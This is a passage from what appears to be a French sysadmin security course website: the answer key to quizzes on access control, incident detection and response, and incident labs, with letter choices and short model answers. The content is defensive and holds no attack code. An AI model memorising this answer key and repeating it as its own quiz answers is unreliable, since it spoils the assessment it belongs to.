<li><strong>A</strong></li>
<li><strong>B</strong></li>
<li><strong>B</strong></li>
<li>Si le compte admin quotidien est compromis (phishing, malware), l'attaquant a tous les droits. Un compte standard limite l'impact.</li>
<li>Authentification = prouver son identité (login/mot de passe). Autorisation = ce qu'on a le droit de faire une fois authentifié (lire/écrire/exécuter).</li>
<li>Créer un compte dédié, droits limités au périmètre précis, date d'expiration explicite, notification à l'échéance, révocation automatique.</li>
<li><strong>B</strong></li>
<li>L'ancien prestataire (ou un attaquant qui a compromis son compte) conserve un accès non surveillé au système.</li>
<li>Immédiatement — via AD, un <code>Disable-ADAccount</code> suffit. La centralisation permet une révocation en quelques secondes.</li>
<li><strong>A</strong></li>
<li>Pour limiter la durée d'exploitation d'un mot de passe compromis mais non détecté.</li>
<li>Changer le mot de passe immédiatement, vérifier si le compte a été utilisé anormalement (logs), renforcer la politique de mot de passe.</li>
<li><strong>A</strong></li>
<li>"Chaque employé a exactement les accès dont il a besoin pour son travail, rien de plus. Ça limite les dégâts en cas de compte compromis."</li>
<li><strong>A</strong></li>
</ol>
<h3 id="c-corrige-module-3-detection-et-reponse">C. Corrigé — Module 3 (Détection et réponse)<a class="headerlink" href="#c-corrige-module-3-detection-et-reponse" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>B</strong></li>
<li><strong>B</strong></li>
<li><strong>B</strong></li>
<li>La RAM contient des preuves volatiles (processus actifs, connexions réseau, clés de chiffrement) qui disparaissent à l'extinction.</li>
<li>Confinement = limiter la propagation (isoler le système). Éradication = supprimer la cause racine (malware, backdoor, compte compromis).</li>
<li>Confinement immédiat : bloquer l'IP, couper l'accès réseau de l'utilisateur concerné, vérifier ce qui a été fait pendant la session.</li>
<li><strong>A</strong></li>
<li>Date, nature de l'incident, systèmes touchés, actions prises, impact, recommandations.</li>
<li>fail2ban mal configuré (seuil trop élevé, temps de bannissement trop court), IP dans une liste blanche, logs non surveillés.</li>
<li><strong>B</strong></li>
<li>Pour une enquête forensique (comprendre ce qui s'est passé), une éventuelle action en justice, et pour auditer l'incident.</li>
<li>Compromission probable du service web → élévation de privilèges (exploit du service vers shell). Confiner immédiatement.</li>
<li><strong>A</strong></li>
<li>Résumé factuel : quoi, quand, impact métier, actions prises, mesures pour éviter la répétition. Pas de jargon technique excessif.</li>
<li><strong>A</strong></li>
</ol>
<h3 id="d-corrige-module-4-labs-incidents">D. Corrigé — Module 4 (Labs incidents)<a class="headerlink" href="#d-corrige-module-4-labs-incidents" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>A</strong></li>
<li><strong>B</strong></li>
<li><strong>B</strong></li>
<li>Pour comprendre la séquence exacte des événements, identifier la cause initiale, et estimer la durée de compromission.</li>
<li>IOC = preuve qu'une intrusion a eu lieu (fichier suspect, processus inconnu). Vulnérabilité = faiblesse qui pourrait permettre une intrusion (version obsolète, mauvaise config).</li>
<li>Confinement : bloquer l'IP source, vérifier si le fichier shell.php a été créé, analyser le fichier, couper l'accès réseau si compromission confirmée.</li>
<li><strong>A</strong></li>
<li>Les logs sont des preuves essentielles pour l'enquête forensique. Leur suppression peut être illégale et empêche de comprendre l'incident.</li>
<li>L'attaquant a installé une backdoor persistante (cron, service, clé SSH) qui survit au confinement réseau.</li>
<li><strong>A</strong></li>
<li>Prioriser par impact métier : quels systèmes sont touchés ? Quel est le potentiel de propagation ? Y a-t-il des données sensibles en jeu ?</li>
<li>La cause racine n'a pas été traitée — seul le symptôme a été corrigé. Refaire une RCA approfondie.</li>
<li><strong>A</strong></li>
<li>"J'ai détecté un incident via les logs, appliqué le confinement, corrigé la cause racine, et documenté la procédure pour éviter que ça se reproduise."</li>
<li><strong>A</strong></li>
</ol>
<h3 id="e-corrige-module-5-banque-p1">E. Corrigé — Module 5 (Banque + P1)<a class="headerlink" href="#e-corrige-module-5-banque-p1" title="Permanent link">&para;</a></h3>
<ol>
<li><strong>A</strong></li>
<li>Un rapport d'incident documenté (anonymisé) + une SOP de durcissement + la démonstration d'une correction de faille.</li>
<li><strong>A</strong></li>
<li>"J'ai détecté l'incident via les logs, appliqué le cycle NIST, résolu la cause racine, et mis en place des mesures pour éviter la récidive."</li>
<li>La sécurité est une responsabilité de l'admin système : durcir les serveurs, gérer les accès, détecter les incidents.</li>
<li><strong>A</strong></li>
<li>Le rapport d'incident anonymisé + la procédure de durcissement à 10 points.</li>
<li><strong>A</strong></li>
<li>"Je bloque l'IP source, vérifie si une connexion a réussi, renforce la config SSH, et documente l'incident."</li>
<li><strong>A</strong></li>
<li>Ça prouve que tu ne fais pas que de la théorie — tu as une méthode de réponse aux incidents applicable en entreprise.</li>
<li>"Je n'ai pas encore la certification, mais j'ai appliqué concrètement les principes sur des labs : durcissement, détection d'intrusion, réponse aux incidents. Mes rapports le prouvent."</li>
<li><strong>A</strong></li>
<li>Temps de détection d'un incident simulé + qualité du rapport produit.</li>
<li><strong>A</strong></li>
</ol>









  




                
              </article>
            </div>
          
          
  <script>var tabs=__md_get("__tabs");if(Array.isArray(tabs))e:for(var set of document.querySelectorAll(".tabbed-set")){var labels=set.querySelector(".tabbed-labels");for(var tab of tabs)for(var label of labels.getElementsByTagName("label"))if(label.innerText.trim()===tab){var input=document.getElementById(label.htmlFor);input.checked=!0;continue e}}</script>

<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
          <button type="button" class="md-top md-icon" data-md-component="top" hidden>
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
  Retour en haut de la page
</button>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
</div>
      
        
<div class="md-social">
  
    
    
    
    
      
      
    
    <a href="https://github.com/Adolphechris/Paradis-formation-it" target="_blank" rel="noopener" title="github.com" class="md-social__link">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    
      
      
      <script id="__config" type="application/json">{"annotate": null, "base": "../..", "features": ["navigation.tabs", "navigation.sections", "navigation.top", "search.suggest", "search.highlight", "content.code.copy", "content.tabs.link", "header.autohide"], "search": "../../assets/javascripts/workers/search.2c215733.min.js", "tags": null, "translations": {"clipboard.copied": "Copi\u00e9 dans le presse-papier", "clipboard.copy": "Copier dans le presse-papier", "search.result.more.one": "1 de plus sur cette page", "search.result.more.other": "# de plus sur cette page", "search.result.none": "Aucun document trouv\u00e9", "search.result.one": "1 document trouv\u00e9", "search.result.other": "# documents trouv\u00e9s", "search.result.placeholder": "Taper pour d\u00e9marrer la recherche", "search.result.term.missing": "Non trouv\u00e9", "select.version": "S\u00e9lectionner la version"}, "version": null}</script>
    
    
      <script src="../../assets/javascripts/bundle.d7400e89.min.js"></script>
      
        <script src="../../js/markdown-parser.js"></script>
      
        <script src="../../js/progress-tracker.js"></script>
      
        <script src="../../js/quiz-engine.js"></script>
      
        <script src="../../js/search-engine.js"></script>
      
        <script src="../../js/radar-chart.js"></script>
      
        <script src="../../js/pdf-export.js"></script>
      
        <script src="../../js/chat-widget.js"></script>
      
        <script src="../../js/backup.js"></script>
      
    
  </body>
</html>